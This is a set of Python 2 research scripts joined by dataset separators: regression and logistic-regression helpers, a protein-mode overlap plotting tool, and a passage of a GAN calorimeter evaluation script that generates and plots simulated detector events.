matrix_args_array_only = transform_arguments(lambda arg: np.matrix(arg, copy=False) if isinstance(arg, np.ndarray) else arg)
@matrix_args
def J_liner_regression(X, y, theta):
temp = X*theta - y
return (temp.T*temp/(2*len(y)))[0, 0]
@matrix_args_array_only
def gradient_descent(cost_function, X, y, iterations, intial_theta, alpha):
m = len(y)
theta = intial_theta
J_history = []
for _ in xrange(iterations):
theta = theta - (alpha/m)*X.T*(X * theta - y)
J_history.append(cost_function(X, y, theta))
return theta, J_history
def add_zero_feature(X, axis=1):
return np.append(np.ones((X.shape[0], 1) if axis else (1, X.shape[1])), X, axis=axis)
def sigmoid(z):
return 1/(1+np.exp(-z))
def lr_accuracy(X, y, theta):
theta = theta[:, np.newaxis]
temp = sigmoid(np.dot(X, theta)).ravel()
p = np.zeros(len(X))
p[temp >= 0.5] = 1
return np.mean(p == y.ravel())*100
@matrix_args
def cf_lr(theta, X, y):
theta = theta.T
m = len(y)
Z = sigmoid(X*theta)
J = (-y.T*np.log(Z) - (1-y).T*np.log(1-Z))/m
return J[0, 0]
@matrix_args
def gf_lr(theta, X, y):
theta = theta.T
m = len(y)
res = (X.T*(sigmoid(X*theta)-y))/m
return res.A1
@matrix_args_array_only
def cf_lr_reg(theta, X, y, lambda_coef):
theta = theta.T
m = len(y)
lambda_coef = float(lambda_coef)
Z = sigmoid(X*theta)
J = (-y.T * np.log(Z) - (1-y).T * np.log(1-Z))/m + (lambda_coef/(2 * m))*theta.T*theta
return J[0, 0]
@matrix_args_array_only
def gf_lr_reg(theta, X, y, lambda_coef):
theta = np.matrix(theta.T, copy=True)
lambda_coef = float(lambda_coef)
m = len(y)
Z = X*theta
theta[0, 0] = 0
res = (X.T*(sigmoid(Z)-y))/m + (lambda_coef/m)*theta
return res.A1
def feature_normalize(X):
mu = np.mean(X, axis=0)[np.newaxis, :]
sigma = np.std(X, axis=0)[np.newaxis, :]
return mu, sigma, (X-mu)/sigma
|
StarcoderdataPython
|
1611422
|
<gh_stars>1-10
'''
Created on Jul 9, 2014
@author: oliwa
'''
import sys
import glob
import os
from scriptutils import makeStringEndWith, mkdir_p
import argparse
import numpy as np
import traceback
#import pylab
import matplotlib
matplotlib.use('Agg')
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
from scriptutils import makeStringNotEndWith
def main():
parser = argparse.ArgumentParser(description='Visualize eigenvalues and overlaps')
parser.add_argument('resultsPath', help='Absolute path of the results folders')
parser.add_argument('outputPath', help='outputPath')
parser.add_argument('-title', help='title of the plot')
parser.add_argument('-fileToLookFor_overlap', help='Specify the file with the overlap information')
parser.add_argument('-fileToLookFor_differencesInRank', help='Specify the file with the differencesInRank information')
parser.add_argument('-modes', help='Specify how many modes to plot')
parser.add_argument('-upperOverlapLimit', help='Upper overlap limit, force manually')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.modes:
modes = int(args.modes)
else:
modes = 4
if args.title:
title = args.title
else:
title = ""
if args.outputPath:
outputPath = args.outputPath
else:
outputPath = ""
fileToLookFor_overlap = "singleModeOverlapsFromSuperset.txt"
fileToLookFor_differencesInRank = "differencesInRank.txt"
if args.fileToLookFor_overlap:
fileToLookFor_overlap = args.fileToLookFor
if args.fileToLookFor_differencesInRank:
fileToLookFor_differencesInRank = args.fileToLookFor_differencesInRank
assert os.path.isdir(args.resultsPath)
assert os.path.isdir(args.outputPath)
all340proteinsPaths = glob.glob(args.resultsPath+"*/")
difficults = np.loadtxt("/home/oliwa/workspace/TNMA1/src/BenchmarkAssessmentsOfDifficulty/allinterfaceSuperposed/difficult.txt", dtype="string")
difficults = set(difficults)
dataToPlot_overlaps = []
dataToPlot_differencesInRank = []
proteins = []
counter = 0
for proteinPath in sorted(all340proteinsPaths):
proteinPath = makeStringEndWith(proteinPath, "/")
protein = makeStringNotEndWith(os.path.basename(os.path.normpath(proteinPath)), "/")
if protein not in difficults:
continue
counter += 1
try:
# load overlap
overlap = np.loadtxt(proteinPath+fileToLookFor_overlap)
overlap = overlap[:modes]
overlap = abs(np.array(overlap))
overlap = list(overlap)
if args.upperOverlapLimit:
for i in range(0, len(overlap)):
if overlap[i] > float(args.upperOverlapLimit):
overlap[i] = float(args.upperOverlapLimit)
dataToPlot_overlaps.append(overlap)
protein = os.path.basename(os.path.normpath(proteinPath))
proteins.append(protein)
# load ranking differences
differenceInRank = np.loadtxt(proteinPath+fileToLookFor_differencesInRank, dtype="int")
differenceInRank = list(differenceInRank)
dataToPlot_differencesInRank.append(differenceInRank[:modes])
except IOError as err:
print "IOError occurred, probably there is no such file at the path: ", err
print traceback.format_exc()
print proteins
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#x, y = np.random.rand(2, 100) * 4
y = range(1, len(proteins)+1)
x = range(1, modes+1)
xpos, ypos = np.meshgrid(x, y)
x = xpos.flatten()
y = ypos.flatten()
colors = []
print "overlaps len: ", len(dataToPlot_overlaps)
print "overlaps: ", dataToPlot_overlaps
dataToPlot_overlaps_flattened = np.array(dataToPlot_overlaps).flatten()
maxOverlap = max(dataToPlot_overlaps_flattened)
print "maxOverlap:", maxOverlap
for element in dataToPlot_overlaps_flattened:
colors.append(plt.cm.jet(element/maxOverlap))
#print plt.cm.jet(element/maxOverlap)
print "x", len(x)
print "y", len(y)
#print "colors", len(colors)
print "dataToPlot_differencesInRank len: ",dataToPlot_differencesInRank
dataToPlot_differencesInRank = np.array(dataToPlot_differencesInRank).flatten() + 0.0001
print "dataToPlot_differencesInRank len: ", len(dataToPlot_differencesInRank.flatten())
dx=np.ones(len(x))*0.5
dy=dx
p = ax.bar3d(x-0.25, y-0.25, np.zeros(len(x)), dx, dy, dataToPlot_differencesInRank, color=colors, zsort='average')
ax.set_zlim([min(dataToPlot_differencesInRank), max(dataToPlot_differencesInRank)])
#ax.set_title(title)
# x label for the ascending modes
#ax.set_xticklabels(range(1, modes+1), minor=False)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
ax.set_xlabel("ascending lambda^R modes")
# y label for the proteins
#ax.set_yticklabels(proteins, minor=False)
plt.gca().yaxis.set_major_locator(plt.NullLocator())
ax.set_ylabel("proteins")
# # dataToPlot_overlaps = np.array(dataToPlot_overlaps)
# #
# # fig, ax = plt.subplots(1)
# # ax.set_yticklabels(proteins, minor=False)
# # ax.xaxis.tick_top()
# #
# # p = ax.pcolormesh(dataToPlot_overlaps, cmap="bone")
# # fig.colorbar(p)
# #
# # # put the major ticks at the middle of each cell, notice "reverse" use of dimension
# # ax.set_yticks(np.arange(dataToPlot_overlaps.shape[0])+0.5, minor=False)
# # ax.set_xticks(np.arange(dataToPlot_overlaps.shape[1])+0.5, minor=False)
# #
# # # want a more natural, table-like display (sorting)
# # ax.invert_yaxis()
# # ax.xaxis.tick_top()
# #
# # ax.set_xticklabels(range(1, modes+1), minor=False)
# # ax.set_yticklabels(proteins, minor=False)
# #
# # if args.title:
# # plt.title(args.title+"\n\n")
# output
#outputPath = makeStringEndWith(args.outputPath, "/")+"eigenVis"
#mkdir_p(outputPath)
plt.savefig(outputPath+'/eigenVis_'+title+'.eps', bbox_inches='tight')
plt.savefig(outputPath+'/eigenVis_'+title+'.pdf', bbox_inches='tight')
#plt.show()
# close and reset the plot
plt.clf()
plt.cla()
plt.close()
print "total proteins: ", counter
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3307230
|
import os, h5py
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.colors import LogNorm, Normalize
plt.switch_backend('Agg')
import time
from vegan import discriminator as build_discriminator
from vegan import generator as build_generator
#Get VEGAN params
gen_weights='maelin50_full/params_generator_epoch_049.hdf5'
disc_weights='maelin50_full/params_discriminator_epoch_049.hdf5'
#gen_weights='full_maelin30/params_generator_epoch_029.hdf5'
#disc_weights='full_maelin30/params_discriminator_epoch_029.hdf5'
latent_space =200
num_events=1000
# Other params
save = 1
get_actual = 1
filename10 = 'Gen_full_10.h5'
filename50 = 'Gen_full_50.h5'
filename100 = 'Gen_full_100.h5'
filename150 = 'Gen_full_150.h5'
filename200 = 'Gen_full_200.h5'
filename300 = 'Gen_full_300.h5'
filename400 = 'Gen_full_400.h5'
filename500 = 'Gen_full_500.h5'
## Get Full data
if (get_actual):
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_10GeV/Ele_10GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X10=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y10=np.expand_dims(y, axis=-1)
print X10.shape
print Y10.shape
X10[X10 < 1e-6] = 0
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_50GeV/Ele_50GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X50=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y50=np.expand_dims(y, axis=-1)
X50[X50 < 1e-6] = 0
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_100GeV/Ele_100GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X100=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y100=np.expand_dims(y, axis=-1)
X100[X100 < 1e-6] = 0
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_200GeV/Ele_200GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X200=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y200=np.expand_dims(y, axis=-1)
X200[X200 < 1e-6] = 0
# Histogram Functions
def plot_max(array, index, out_file, num_fig, energy):
## Plot the Histogram of Maximum energy deposition location on all axis
bins = np.arange(0, 25, 1)
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.hist(array[0:index-1, 0], bins=bins, histtype='step', label= str(energy))
plt.legend()
plt.ylabel('Events')
plt.subplot(222)
plt.title('Y-axis')
plt.hist(array[0:index-1, 1], bins=bins, histtype='step', label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.subplot(223)
plt.hist(array[0:index-1, 2], bins=bins, histtype='step', label=str(energy))
plt.legend(loc=1)
plt.xlabel('Position')
plt.ylabel('Events')
plt.savefig(out_file)
def plot_energy(array, index, out_file, num_fig, energy):
### Plot Histogram of energy flat distribution along all three axis
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.hist(array[:index, 0].flatten(), bins='auto', histtype='step', label=str(energy))
plt.legend()
plt.ylabel('Events')
plt.subplot(222)
plt.title('Y-axis')
plt.hist(array[:index, 1].flatten(), bins='auto', histtype='step', label=str(energy))
plt.legend()
plt.xlabel('ECAL Cell Energy')
plt.subplot(223)
plt.hist(array[:index, 2].flatten(), bins='auto', histtype='step', label=str(energy))
plt.legend()
plt.ylabel('Events')
plt.savefig(out_file)
def plot_energy2(array, index, out_file, num_fig, energy, color='blue', style='-'):
### Plot Histogram of energy
plt.figure(num_fig)
ebins=np.arange(0, 500, 5)
label= energy + ' {:.2f}'.format(np.mean(array))+ ' ( {:.2f}'.format(np.std(array)) + ' )'
plt.hist(array, bins=ebins, histtype='step', label=label, color=color, ls=style)
plt.xticks([0, 10, 50, 100, 150, 200, 300, 400, 500])
plt.xlabel('Energy GeV')
plt.ylabel('Events')
plt.legend(title=' Mean (std)', loc=0)
plt.savefig(out_file)
def plot_energy_hist(array, index, out_file, num_fig, energy):
### Plot total energy deposition cell by cell along x, y, z axis
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.plot(array[0:index, 0].sum(axis = 0)/index, label=str(energy))
plt.ylabel('ECAL Energy/Events')
plt.legend()
plt.subplot(222)
plt.title('Y-axis')
plt.plot(array[0:index, 1].sum(axis = 0)/index, label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.subplot(223)
plt.title('Z-axis')
plt.plot(array[0:index, 2].sum(axis = 0)/index, label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.ylabel('ECAL Energy/Events')
plt.savefig(out_file)
def plot_energy_mean(array, index, out_file, num_fig, energy):
### Plot total energy deposition cell by cell along x, y, z axis
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.plot(array[0:index, 0].mean(axis = 0), label=str(energy))
plt.legend()
plt.ylabel('Mean Energy')
plt.subplot(222)
plt.title('Y-axis')
plt.plot(array[0:index, 1].mean(axis = 0), label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.subplot(223)
plt.title('Z-axis')
plt.plot(array[0:index, 2].mean(axis = 0), label=str(energy))
plt.xlabel('Position')
plt.legend()
plt.ylabel('Mean Energy')
plt.savefig(out_file)
def plot_real(array, index, out_file, num_fig, energy):
## Plot the disc real/fake flag
plt.figure(num_fig)
bins = np.arange(0, 1, 0.01)
plt.figure(num_fig)
plt.title('Real/ Fake')
plt.hist(array[0:index-1, 0], bins=bins, histtype='step', label= str(energy))
plt.legend()
plt.ylabel('Events')
plt.xlabel('Real/fake')
plt.savefig(out_file)
def plot_error(array1, array2, index, out_file, num_fig, energy, pos=2):
# plot error
plt.figure(num_fig)
bins = np.linspace(-100, 100, 30)
label= energy + ' {:.2f} '.format(np.multiply(100, np.mean(np.absolute(array1-array2)))) + ' ( {:.2f}'.format(np.multiply(100, np.std(array1-array2)))+ ' )'
plt.hist(np.multiply(100, array1-array2), bins=bins, histtype='step', label=label)
plt.xlabel('error GeV')
plt.ylabel('Number of events')
plt.legend(title=' Mean ( std )', loc=pos)
plt.savefig(out_file)
def plot_ecal(array, index, out_file, num_fig, energy):
# plot ecal sum
bins = np.linspace(0, 11, 50)
plt.figure(num_fig)
plt.title('ECAL SUM')
plt.xlabel('ECAL SUM')
plt.ylabel('Events')
plt.hist(np.sum(array, axis=(1, 2, 3)), bins=bins, histtype='step', label=energy)
plt.legend(loc=0)
plt.savefig(out_file)
# Initialization of parameters
index10 = num_events
index50 = num_events
index100 = num_events
index150 = num_events
index200 = num_events
index300 = num_events
index400 = num_events
index500 = num_events
#Initialization of arrays for actual events
events_act10 = np.zeros((num_events, 25, 25, 25))
max_pos_act_10 = np.zeros((num_events, 3))
events_act50 = np.zeros((num_events, 25, 25, 25))
max_pos_act_50 = np.zeros((num_events, 3))
events_act100 = np.zeros((num_events, 25, 25, 25))
max_pos_act_100 = np.zeros((num_events, 3))
events_act200 = np.zeros((num_events, 25, 25, 25))
max_pos_act_200 = np.zeros((num_events, 3))
sum_act10 = np.zeros((num_events, 3, 25))
sum_act50 = np.zeros((num_events, 3, 25))
sum_act100 = np.zeros((num_events, 3, 25))
sum_act200 = np.zeros((num_events, 3, 25))
energy_sampled10 = np.multiply(0.1, np.ones((num_events, 1)))
energy_sampled50 = np.multiply(0.5, np.ones((num_events, 1)))
energy_sampled100 = np.ones((num_events, 1))
energy_sampled150 = np.multiply(1.5, np.ones((num_events, 1)))
energy_sampled200 = np.multiply(2, np.ones((num_events, 1)))
energy_sampled300 = np.multiply(3, np.ones((num_events, 1)))
energy_sampled400 = np.multiply(4, np.ones((num_events, 1)))
energy_sampled500 = np.multiply(5, np.ones((num_events, 1)))
energy_act10 = np.zeros((num_events, 1))
energy_act50 = np.zeros((num_events, 1))
energy_act100 = np.zeros((num_events, 1))
energy_act200 = np.zeros((num_events, 1))
energy_act300 = np.zeros((num_events, 1))
#Initialization of arrays for generated images
events_gan10 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_10 = np.zeros((num_events, 3))
events_gan50 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_50 = np.zeros((num_events, 3))
events_gan100 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_100 = np.zeros((num_events, 3))
events_gan150 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_150 = np.zeros((num_events, 3))
events_gan200 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_200 = np.zeros((num_events, 3))
events_gan300 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_300 = np.zeros((num_events, 3))
events_gan400 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_400 = np.zeros((num_events, 3))
events_gan500 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_500 = np.zeros((num_events, 3))
sum_gan10 = np.zeros((num_events, 3, 25))
sum_gan50 = np.zeros((num_events, 3, 25))
sum_gan100 = np.zeros((num_events, 3, 25))
sum_gan150 = np.zeros((num_events, 3, 25))
sum_gan200 = np.zeros((num_events, 3, 25))
sum_gan300 = np.zeros((num_events, 3, 25))
sum_gan400 = np.zeros((num_events, 3, 25))
sum_gan500 = np.zeros((num_events, 3, 25))
energy_gan10 = np.zeros((num_events, 1))
energy_gan50 = np.zeros((num_events, 1))
energy_gan100 = np.zeros((num_events, 1))
energy_gan150 = np.zeros((num_events, 1))
energy_gan200 = np.zeros((num_events, 1))
energy_gan300 = np.zeros((num_events, 1))
energy_gan400 = np.zeros((num_events, 1))
energy_gan500 = np.zeros((num_events, 1))
### Get Generated Data
## events for 10 GeV
g = build_generator(latent_space, return_intermediate=False)
g.load_weights(gen_weights)
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled10
generator_in = np.multiply(sampled_labels, noise)
start = time.time()
generated_images10 = g.predict(generator_in, verbose=False, batch_size=100)
end = time.time()
gen_time = end - start
print generated_images10.shape
print gen_time
d = build_discriminator()
d.load_weights(disc_weights)
start =time.time()
isreal10, aux_out10 = np.array(d.predict(generated_images10, verbose=False, batch_size=100))
end = time.time()
disc_time = end - start
generated_images10 = np.squeeze(generated_images10)
print generated_images10.shape
print disc_time
## events for 50 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled50
generator_in = np.multiply(sampled_labels, noise)
generated_images50 = g.predict(generator_in, verbose=False, batch_size=100)
isreal50, aux_out50 = np.array(d.predict(generated_images50, verbose=False, batch_size=100))
generated_images50 = np.squeeze(generated_images50)
## events for 100 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled100
generator_in = np.multiply(sampled_labels, noise)
generated_images100 = g.predict(generator_in, verbose=False, batch_size=100)
isreal100, aux_out100 = np.array(d.predict(generated_images100, verbose=False, batch_size=100))
generated_images100 = np.squeeze(generated_images100)
## events for 150 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled150
generator_in = np.multiply(sampled_labels, noise)
generated_images150 = g.predict(generator_in, verbose=False, batch_size=100)
isreal150, aux_out150 = np.array(d.predict(generated_images150, verbose=False, batch_size=100))
generated_images150 = np.squeeze(generated_images150)
## events for 200 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled200
generator_in = np.multiply(sampled_labels, noise)
generated_images200 = g.predict(generator_in, verbose=False, batch_size=100)
isreal200, aux_out200 = np.array(d.predict(generated_images200, verbose=False, batch_size=100))
generated_images200 = np.squeeze(generated_images200)
## events for 300 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled300
generator_in = np.multiply(sampled_labels, noise)
generated_images300 = g.predict(generator_in, verbose=False, batch_size=100)
isreal300, aux_out300 = np.array(d.predict(generated_images300, verbose=False, batch_size=100))
generated_images300 = np.squeeze(generated_images300)
## events for 400 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled400
generator_in = np.multiply(sampled_labels, noise)
generated_images400 = g.predict(generator_in, verbose=False, batch_size=100)
isreal400, aux_out400 = np.array(d.predict(generated_images400, verbose=False, batch_size=100))
generated_images400 = np.squeeze(generated_images400)
## events for 500 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled500
generator_in = np.multiply(sampled_labels, noise)
generated_images500 = g.predict(generator_in, verbose=False, batch_size=100)
isreal500, aux_out500 = np.array(d.predict(generated_images500, verbose=False, batch_size=100))
generated_images500 = np.squeeze(generated_images500)
## Use Discriminator for actual images
if (get_actual):
## events for 10 GeV
image10 = np.expand_dims(X10, axis=-1)
isreal2_10, aux_out2_10 = np.array(d.predict(image10, verbose=False, batch_size=100))
## events for 50 GeV
image50 = np.expand_dims(X50, axis=-1)
isreal2_50, aux_out2_50 = np.array(d.predict(image50, verbose=False, batch_size=100))
## events for 100 GeV
image100 = np.expand_dims(X100, axis=-1)
isreal2_100, aux_out2_100 = np.array(d.predict(image50, verbose=False, batch_size=100))
## events for 200 GeV
image200 = np.expand_dims(X200, axis=-1)
isreal2_200, aux_out2_200 = np.array(d.predict(image200, verbose=False, batch_size=100))
#calculations for actual
for j in range(num_events):
events_act10[j]= X10[j]
events_act50[j]= X50[j]
events_act100[j]= X100[j]
events_act200[j]= X200[j]
max_pos_act_10[j] = np.unravel_index(events_act10[j].argmax(), (25, 25, 25))
max_pos_act_50[j] = np.unravel_index(events_act50[j].argmax(), (25, 25, 25))
max_pos_act_100[j] = np.unravel_index(events_act100[j].argmax(), (25, 25, 25))
max_pos_act_200[j] = np.unravel_index(events_act200[j].argmax(), (25, 25, 25))
sum_act10[j, 0] = np.sum(events_act10[j], axis=(1,2))
sum_act10[j, 1] = np.sum(events_act10[j], axis=(0,2))
sum_act10[j, 2] = np.sum(events_act10[j], axis=(0,1))
sum_act50[j, 0] = np.sum(events_act50[j], axis=(1,2))
sum_act50[j, 1] = np.sum(events_act50[j], axis=(0,2))
sum_act50[j, 2] = np.sum(events_act50[j], axis=(0,1))
sum_act100[j, 0] = np.sum(events_act100[j], axis=(1,2))
sum_act100[j, 1] = np.sum(events_act100[j], axis=(0,2))
sum_act100[j, 2] = np.sum(events_act100[j], axis=(0,1))
sum_act200[j, 0] = np.sum(events_act200[j], axis=(1,2))
sum_act200[j, 1] = np.sum(events_act200[j], axis=(0,2))
sum_act200[j, 2] = np.sum(events_act200[j], axis=(0,1))
### Calculations for generated
for j in range(num_events):
events_gan10[j]= generated_images10[j]
events_gan50[j]= generated_images50[j]
events_gan100[j]= generated_images100[j]
events_gan150[j]= generated_images150[j]
events_gan200[j]= generated_images200[j]
events_gan300[j]= generated_images300[j]
events_gan400[j]= generated_images400[j]
events_gan500[j]= generated_images500[j]
max_pos_gan_10[j] = np.unravel_index(events_gan10[j].argmax(), (25, 25, 25))
max_pos_gan_50[j] = np.unravel_index(events_gan50[j].argmax(), (25, 25, 25))
max_pos_gan_100[j] = np.unravel_index(events_gan100[j].argmax(), (25, 25, 25))
max_pos_gan_150[j] = np.unravel_index(events_gan150[j].argmax(), (25, 25, 25))
max_pos_gan_200[j] = np.unravel_index(events_gan200[j].argmax(), (25, 25, 25))
max_pos_gan_300[j] = np.unravel_index(events_gan300[j].argmax(), (25, 25, 25))
max_pos_gan_400[j] = np.unravel_index(events_gan400[j].argmax(), (25, 25, 25))
max_pos_gan_500[j] = np.unravel_index(events_gan500[j].argmax(), (25, 25, 25))
sum_gan10[j, 0] = np.sum(events_gan50[j], axis=(1,2))
sum_gan10[j, 1] = np.sum(events_gan50[j], axis=(0,2))
sum_gan10[j, 2] = np.sum(events_gan50[j], axis=(0,1))
sum_gan50[j, 0] = np.sum(events_gan50[j], axis=(1,2))
sum_gan50[j, 1] = np.sum(events_gan50[j], axis=(0,2))
sum_gan50[j, 2] = np.sum(events_gan50[j], axis=(0,1))
sum_gan100[j, 0] = np.sum(events_gan100[j], axis=(1,2))
sum_gan100[j, 1] = np.sum(events_gan100[j], axis=(0,2))
sum_gan100[j, 2] = np.sum(events_gan100[j], axis=(0,1))
sum_gan150[j, 0] = np.sum(events_gan150[j], axis=(1,2))
sum_gan150[j, 1] = np.sum(events_gan150[j], axis=(0,2))
sum_gan150[j, 2] = np.sum(events_gan150[j], axis=(0,1))
sum_gan200[j, 0] = np.sum(events_gan200[j], axis=(1,2))
sum_gan200[j, 1] = np.sum(events_gan200[j], axis=(0,2))
sum_gan200[j, 2] = np.sum(events_gan200[j], axis=(0,1))
sum_gan300[j, 0] = np.sum(events_gan300[j], axis=(1,2))
sum_gan300[j, 1] = np.sum(events_gan300[j], axis=(0,2))
sum_gan300[j, 2] = np.sum(events_gan300[j], axis=(0,1))
sum_gan400[j, 0] = np.sum(events_gan400[j], axis=(1,2))
sum_gan400[j, 1] = np.sum(events_gan400[j], axis=(0,2))
sum_gan400[j, 2] = np.sum(events_gan400[j], axis=(0,1))
sum_gan500[j, 0] = np.sum(events_gan500[j], axis=(1,2))
sum_gan500[j, 1] = np.sum(events_gan500[j], axis=(0,2))
sum_gan500[j, 2] = np.sum(events_gan500[j], axis=(0,1))
## Generate Data table to screen
if (get_actual):
print "Actual Data"
print "Energy\t\t Events\t\tMaximum Value\t\t Maximum loc\t\t\t Mean\t\t\t Minimum\t\t"
print "50 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index10, np.amax(events_act10), str(np.unravel_index(events_act10.argmax(), (index10, 25, 25, 25))), np.mean(events_act10), np.amin(events_act10))
print "50 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index50, np.amax(events_act50), str(np.unravel_index(events_act50.argmax(), (index50, 25, 25, 25))), np.mean(events_act50), np.amin(events_act50))
print "100 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index100, np.amax(events_act100), str(np.unravel_index(events_act100.argmax(), (index100, 25, 25, 25))), np.mean(events_act100), np.amin(events_act100))
print "200 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index200, np.amax(events_act200), str(np.unravel_index(events_act200.argmax(), (index200, 25, 25, 25))), np.mean(events_act200), np.amin(events_act200))
#### Generate GAN table to screen
print "Generated Data"
print "Energy\t\t Events\t\tMaximum Value\t\t Maximum loc\t\t\t Mean\t\t\t Minimum\t\t"
print "10 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index10, np.amax(events_gan10), str(np.unravel_index(events_gan10.argmax(), (index10, 25, 25, 25))), np.mean(events_gan10), np.amin(events_gan10))
print "50 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index50, np.amax(events_gan50), str(np.unravel_index(events_gan50.argmax(), (index50, 25, 25, 25))), np.mean(events_gan50), np.amin(events_gan50))
print "100 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index100, np.amax(events_gan100), str(np.unravel_index(events_gan100.argmax(), (index100, 25, 25, 25))), np.mean(events_gan100), np.amin(events_gan100))
print "150 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index150, np.amax(events_gan150), str(np.unravel_index(events_gan150.argmax(), (index150, 25, 25, 25))), np.mean(events_gan150), np.amin(events_gan150))
print "200 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index200, np.amax(events_gan200), str(np.unravel_index(events_gan200.argmax(), (index200, 25, 25, 25))), np.mean(events_gan200), np.amin(events_gan200))
print "300 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index300, np.amax(events_gan300), str(np.unravel_index(events_gan300.argmax(), (index300, 25, 25, 25))), np.mean(events_gan300), np.amin(events_gan300))
print "400 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index400, np.amax(events_gan400), str(np.unravel_index(events_gan400.argmax(), (index400, 25, 25, 25))), np.mean(events_gan400), np.amin(events_gan400))
print "500 \t\t%d \t\t%f \t\t%s \t\t%f \t\t%f" %(index500, np.amax(events_gan500), str(np.unravel_index(events_gan500.argmax(), (index500, 25, 25, 25))), np.mean(events_gan500), np.amin(events_gan500))
def safe_mkdir(path):
'''
Safe mkdir (i.e., don't create if already exists,
and no violation of race conditions)
'''
from os import makedirs
from errno import EEXIST
try:
makedirs(path)
except OSError as exception:
if exception.errno != EEXIST:
raise exception
## Make folders for plots
discdir = 'fixed_plots/disc_outputs'
safe_mkdir(discdir)
actdir = 'fixed_plots/Actual'
safe_mkdir(actdir)
gendir = 'fixed_plots/Generated'
safe_mkdir(gendir)
comdir = 'fixed_plots/Combined'
safe_mkdir(comdir)
## Make plots for generated data
plot_real(isreal10, index10, os.path.join(discdir, 'real_10.pdf'), 1, 'GAN 10')
plot_real(isreal50, index50, os.path.join(discdir, 'real_50.pdf'), 2, 'GAN 50')
plot_real(isreal100, index100, os.path.join(discdir, 'real_100.pdf'), 3, 'GAN 100')
plot_real(isreal150, index150, os.path.join(discdir, 'real_150.pdf'), 4, 'GAN 150')
plot_real(isreal200, index200, os.path.join(discdir, 'real_200.pdf'), 5, 'GAN 200')
plot_real(isreal300, index300, os.path.join(discdir, 'real_300.pdf'), 6, 'GAN 300')
plot_real(isreal400, index400, os.path.join(discdir, 'real_400.pdf'), 47, 'GAN 400')
plot_real(isreal500, index500, os.path.join(discdir, 'real_500.pdf'), 48, 'GAN 500')
plot_error(energy_sampled10, aux_out10, index10, os.path.join(discdir, 'error_10.pdf'), 7, 'GAN 10')
plot_error(energy_sampled50, aux_out50, index50, os.path.join(discdir, 'error_50.pdf'), 8, 'GAN 50')
plot_error(energy_sampled100, aux_out100, index100, os.path.join(discdir, 'error_100.pdf'), 9, 'GAN 100')
plot_error(energy_sampled200, aux_out200, index200, os.path.join(discdir, 'error_200.pdf'), 10, 'GAN 200')
plot_error(energy_sampled300, aux_out300, index300, os.path.join(discdir, 'error_300.pdf'), 11, 'GAN 300')
plot_error(energy_sampled400, aux_out400, index400, os.path.join(discdir, 'error_400.pdf'), 49, 'GAN 400')
plot_error(energy_sampled500, aux_out500, index500, os.path.join(discdir, 'error_500.pdf'), 50, 'GAN 500')
plot_max(max_pos_gan_10, index10, os.path.join(comdir, 'Position_of_max_10.pdf'), 12, 'GAN 10')
plot_max(max_pos_gan_50, index50, os.path.join(comdir, 'Position_of_max_50.pdf'), 13, 'GAN 50')
plot_max(max_pos_gan_100, index100, os.path.join(comdir, 'Position_of_max_100.pdf'), 14, 'GAN 100')
plot_max(max_pos_gan_150, index150, os.path.join(comdir, 'Position_of_max_150.pdf'), 15, 'GAN 150')
